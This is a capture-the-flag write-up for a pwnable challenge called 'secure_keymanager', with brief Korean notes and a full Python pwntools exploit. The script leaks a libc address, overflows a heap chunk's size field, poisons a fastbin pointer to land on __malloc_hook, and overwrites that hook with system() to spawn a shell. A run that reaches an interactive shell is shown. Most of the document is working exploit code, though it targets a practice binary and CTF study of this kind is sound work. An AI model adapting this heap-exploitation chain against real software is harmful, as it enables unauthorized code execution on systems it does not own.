Category : pwnable
secure_keymanager-f9d02e8a1149ff866cad10f001e8f23803bcac3c42ed7ffdcbe50da40e8afd12.zip |
Summary : simple heap overflow (a 0x1f-byte title spills into the next chunk's size field), then fastbin fd poisoning into __malloc_hook — the exploit below overwrites __malloc_hook with system(), it does not target the stack.
그냥 fastbin 문제. 헬게이트 문제로 기억했는데 다른 거였나 봄. 하지만 이상한 삽질하다가 시간이 더 걸린 건 반성하기.
malloc_hook에서 원가젯을 바로 못 쓰면 다른 hook과 연동해서 간단하게 rsp를 컨트롤하기. (여기서는 원가젯 대신 __malloc_hook = system 으로 두고, malloc 크기 인자를 "/bin/sh" 주소로 넘겨서 해결했다.)
malloc에 어떤 인자가 들어가는지 제대로 기억하기 — __malloc_hook은 malloc의 size 인자를 그대로 받으므로, 마지막 add에서 key length로 master_addr - 32 를 넘겨 (프로그램이 길이에 32를 더하는 것으로 보임) system("/bin/sh")가 호출되게 했다.
ex.py
#!/usr/bin/python
from pwn import *
def cmd_add(key_len, title, key):
    """Drive menu option 1 (add a key entry) on the target.

    Answers the length/title prompts with ``key_len`` and ``title``; ``key``
    is sent only for a non-negative length, because the exploit relies on a
    negative length to get a small allocation without the target reading any
    key bytes (the prompt is still printed and consumed). Uses the
    module-level ``ru``/``ss`` aliases bound to the spawned process.
    """
    exchanges = (
        ('>> ', '1'),
        ('Input key length...', str(key_len)),
        ('Input title...', title),
    )
    for prompt, reply in exchanges:
        ru(prompt)
        ss(reply)
    ru('Input key...')
    # Negative length: the target appears to skip the key read, so sending
    # data here would desynchronise the menu.
    if key_len < 0:
        return
    ss(key)
def cmd_edit(idx, new_key, _account=None, _master=None):
    """Drive menu option 3 (EDIT KEY) on the target.

    Normal path: authenticate with the module-level ``account``/``master``,
    then overwrite entry ``idx`` with ``new_key``; returns None.

    Leak path: when ``_account`` is truthy it is sent as the account name and
    the function returns the raw bytes echoed between ``Account '`` and the
    next ``'`` (delimiter included, hence the caller's ``[0x18:-1]``). With an
    unterminated 0x18-byte name this echoes whatever follows the buffer. The
    remaining prompts are left unconsumed on this path.

    ``_master`` is accepted for symmetry with cmd_remove but is never sent.
    Uses the module-level ``ru``/``ss``/``rl`` process aliases.
    """
    ru('>> ')
    ss('3')
    ru('EDIT KEY\n')
    ru('Input Account Name >> ')
    if _account:
        ss(_account)
        ru('Account \'')
        echoed = ru('\'')
        rl()
        return echoed
    ss(account)
    for prompt, reply in (
        ('Input Master Pass >> ', master),
        ('Input id to edit...', str(idx)),
        ('Input new key...', new_key),
    ):
        ru(prompt)
        ss(reply)
def cmd_remove(idx, _account=None, _master=None):
    """Drive menu option 4 (REMOVE KEY) on the target.

    Normal path: authenticate with the module-level ``account``/``master``
    and free entry ``idx``; returns None.

    Leak path: when ``_account`` is truthy it is sent as the account name and
    the raw bytes echoed between ``Account '`` and the next ``'`` (delimiter
    included) are returned; the remaining prompts are left unconsumed.

    ``_master`` is accepted for symmetry with cmd_edit but is never sent.
    Uses the module-level ``ru``/``ss``/``rl`` process aliases.
    """
    ru('>> ')
    ss('4')
    ru('REMOVE KEY\n')
    ru('Input Account Name >> ')
    if _account:
        ss(_account)
        ru('Account \'')
        echoed = ru('\'')
        rl()
        return echoed
    ss(account)
    for prompt, reply in (
        ('Input Master Pass >> ', master),
        ('Input id to remove...', str(idx)),
    ):
        ru(prompt)
        ss(reply)
# Credentials the target asks for at startup. ``master`` doubles as the
# "/bin/sh" string that system() eventually receives (see master_addr).
account = 'pwn3r'
master = '/bin/sh'
s = process('./secure_keymanager')
# Short aliases used by the cmd_* helpers above (sl is unused).
ru = s.recvuntil
rl = s.recvline
sl = s.sendline
ss = s.send
ss(account+'\x00')
ss(master+'\x00')
# Heap setup: three adjacent entries. chunk1 and chunk3 are freed later so
# chunk1 can be re-obtained (fastbin LIFO) and its title overflowed into
# chunk2's size field. The "0x68 - 32" sizes suggest the target adds 32 to
# key_len before malloc, landing chunk3 in the 0x70 fastbin.
cmd_add(-16, 'chunk1', '')
cmd_add(16, 'chunk2', 'data')
cmd_add(0x68 - 32, 'chunk3', 'data')
# Info leak: an unterminated 0x18-byte account name makes the target echo the
# bytes that follow the buffer; they are taken as a libc pointer and the
# subtraction converts it to the libc base.
libc_base = u64(cmd_edit(0, '', _account='a'*0x18)[0x18:-1].ljust(8, '\x00')) - 0x7a81b
# NOTE(review): all three offsets are specific to one libc build (they look
# like the usual Ubuntu 16.04 glibc 2.23 values) -- re-derive them for any
# other libc before reusing this script.
libc_malloc_hook = libc_base + 0x3c4b10
libc_system = libc_base + 0x45390
master_addr = 0x602130 # "/bin/sh\x00" in the binary's data; fixed address, so the binary is non-PIE
print hex(libc_base)
cmd_remove(0) # free chunk1 (small fastbin chunk, re-obtained next)
cmd_remove(2) # free chunk3 (0x70 fastbin)
# chunk1 comes back from the fastbin; the 0x1f-byte title overflows its
# 0x18-byte field and rewrites chunk2's size to 0xb1, so a later edit of
# chunk2 can reach into chunk3.
cmd_add(-16, 'a'*0x18+p64(0xb1)[:-1], '') # overwrite chunk2 size
# Through the enlarged chunk2, rewrite chunk3's header: keep size 0x71 intact
# and point its fastbin fd at a fake chunk just before __malloc_hook (the
# standard misaligned-0x7f-size trick; the -0x23 is that fake chunk's base).
cmd_edit(1, 'a'*0x10+p64(0)+p64(0x71)+p64(libc_malloc_hook - 0x23)) # overwrite chunk3 fd
cmd_add(0x68 - 32, 'chunk3 again', 'data') # chunk3 again -- pops the real chunk; the fake one is now first in the bin
# Fake chunk's user data starts 0x10 past its base (= __malloc_hook - 0x13):
# pad 0x13 bytes so system() lands exactly on __malloc_hook.
payload = 'a'*(0x23-0x10) + p64(libc_system)
cmd_add(0x68 - 32, payload, '\x00') # *libc_malloc_hook = libc_system
# Trigger: the next malloc() calls __malloc_hook(size). Passing master_addr-32
# as the key length means (after the target's apparent +32) the hook -- now
# system() -- receives the address of "/bin/sh".
ru('>> ')
ss('1')
ru('Input key length...')
ss(str(master_addr - 32))
s.interactive()
s.close()
Exploit
$ python ex.py
[+] Starting local process './secure_keymanager': pid 25650
0x7febf6a9d000
[*] Switching to interactive mode
$ id
uid=1000(pwn3r) gid=1000(pwn3r) groups=1000(pwn3r)